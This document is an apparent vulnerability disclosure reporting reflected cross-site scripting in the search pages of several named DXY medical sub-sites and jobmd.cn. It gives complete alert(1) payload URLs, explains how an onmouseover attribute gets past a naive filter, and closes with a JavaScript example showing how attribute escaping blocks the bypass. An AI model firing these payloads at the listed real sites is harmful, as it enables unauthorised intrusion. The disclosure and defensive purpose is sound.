The search box on DXY is quite strange. Most search boxes I run into filter out special characters such as <> or ". Only some DXY sub-sites do not filter them (in fact many of them; almost all are affected).

Affected sites:

http://meeting.dxy.cn/search.do?keywords=1><script/src="</script>alert(1)//" onmouseover="alert(1)//>
http://ihealth.dxy.cn/search.do?keywords=1><script/src="</script>alert(1)//"%20onmouseover="alert(1)///>
http://heart.dxy.cn/search.do?keywords=1><script/src="</script>alert(1)//"%20onmouseover="alert(1)///>
http://infect.dxy.cn/search.do?keywords=1><script/src="</script>alert(1)//"%20onmouseover="alert(1)///>
http://endo.dxy.cn/search.do?keywords=1><script/src="</script>alert(1)//"%20onmouseover="alert(1)///>
http://oncol.dxy.cn//search.do?keywords=1><script/src="</script>alert(1)//"%20onmouseover="alert(1)///>
http://yao.dxy.cn/search.do?keywords=1%3E%3Cscript/src=%22%3C/script%3Ealert%281%29//%22%20onmouseover=%22alert%281%29//%3E
http://6d.dxy.cn//search.do?keywords=1><script/src="</script>alert(1)//"%20onmouseover="alert(1)///>

XSS exists on all of these. My list may not be complete, and the DXY team should check the remaining sub-sites themselves.

Entering <script>alert(1)</script> in the search box for testing produced the following output: <script><![CDATA[alert(1)]]></script>. At the time it was hard to make a breakthrough, because I did not know what their filtering method was. Later I consulted an expert and finally, based on my own summary, got the code to execute: we need to use the onmouseover event to run it. Since the number of affected sub-sites is large, I gave it a self-assessed rank of 10 together with the above.

We know that a filter that does not filter the special characters themselves is incomplete, and the DXY programmers made exactly this mistake. So we only need to construct 1><script/src="</script>alert(1)//"%20onmouseover="alert(1)////> to bypass the restriction. Here the leading > closes the preceding tag; of course the angle brackets are not filtered here, otherwise nothing inside <script> could execute at all. As we know, </script> takes priority over the JS: the HTML parser ends the script element at </script> wherever it appears, so it can interrupt JS code at any point. I am not sure whether it can also interrupt the logic of <script><![CDATA[alert(1)]]></script>. Finally, // comments out the trailing error, and combined with alert the small window pops up. Another location that also has XSS: http://ent.jobmd.cn/search?keywords=%3Cscript%3Ealert%281%29%3C%2Fscript%3E
Solution:
You still have to filter them out; you can't leave a door open. :) Filter method: refer to the search boxes that already filter. No other problems found so far.
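The report above says the bypass worked because the special characters themselves were never neutralized, and the fix is to filter them like the other search boxes do. The following is an added example, not code from the report or from DXY: it reconstructs a naive filter that behaves like the observed output (wrapping the body of a literal <script>...</script> pair in CDATA; this reconstruction is an assumption, the real DXY filter is unknown), reflects the keyword into an assumed search-box value="..." attribute, and checks, the way a browser tokenizes a quoted attribute, whether an event-handler attribute escapes the value. The hardened version escapes & < > " ' before reflecting. PAYLOAD_BYPASS is the payload from the affected URLs; all function names are mine.

```javascript
// Added example (not DXY's code). naiveCdataFilter is a reconstruction
// guessed from the report's observed output; the real filter is unknown.

// Naive filter: only rewrites a literal <script>...</script> pair and leaves
// every other '<', '>' and '"' in the input untouched.
function naiveCdataFilter(input) {
  return String(input).replace(
    /<script>([\s\S]*?)<\/script>/gi,
    (_, body) => `<script><![CDATA[${body}]]></script>`,
  );
}

// Hardened filter: attribute-context escaping of every HTML metacharacter,
// so nothing the user types can close the attribute or the tag.
function escapeHtmlAttr(input) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
  return String(input).replace(/[&<>"']/g, (c) => map[c]);
}

// Reflects the search keyword back into the page the way search.do appears
// to: inside the value="..." attribute of the search box (assumed markup).
function renderSearchBox(keyword, filter) {
  return `<input type="text" name="keywords" value="${filter(keyword)}">`;
}

// Mimics the one tokenizer detail that matters here: a double-quoted
// attribute value ends at the first '"'. Anything after that quote that is
// still inside the tag is parsed as further attributes, so any on*= found
// there is an injected event handler.
function injectedHandlers(renderedTag) {
  const marker = 'value="';
  const start = renderedTag.indexOf(marker) + marker.length;
  const end = renderedTag.indexOf('"', start);
  const tail = renderedTag.slice(end + 1);
  return (tail.match(/\bon\w+(?=\s*=)/gi) || []).map((s) => s.toLowerCase());
}

// Probe from the report; the author saw it come back CDATA-wrapped.
const PAYLOAD_SIMPLE = '<script>alert(1)</script>';
// Working payload from the affected URLs (constructed copy, not a live fetch).
const PAYLOAD_BYPASS = '1><script/src="</script>alert(1)//" onmouseover="alert(1)//>';

// Returns what each filter does with the two payloads.
function demo() {
  return {
    simpleThroughNaive: naiveCdataFilter(PAYLOAD_SIMPLE),
    naiveInjected: injectedHandlers(renderSearchBox(PAYLOAD_BYPASS, naiveCdataFilter)),
    escapedInjected: injectedHandlers(renderSearchBox(PAYLOAD_BYPASS, escapeHtmlAttr)),
  };
}

console.log(demo());
```

The naive filter only ever matches a literal <script>...</script> pair, so <script/src=... never triggers it, and the unfiltered > and " are what let the onmouseover attribute land on the tag; escapeHtmlAttr removes that possibility regardless of what the payload looks like, which is what "filter it out" in the solution means in practice.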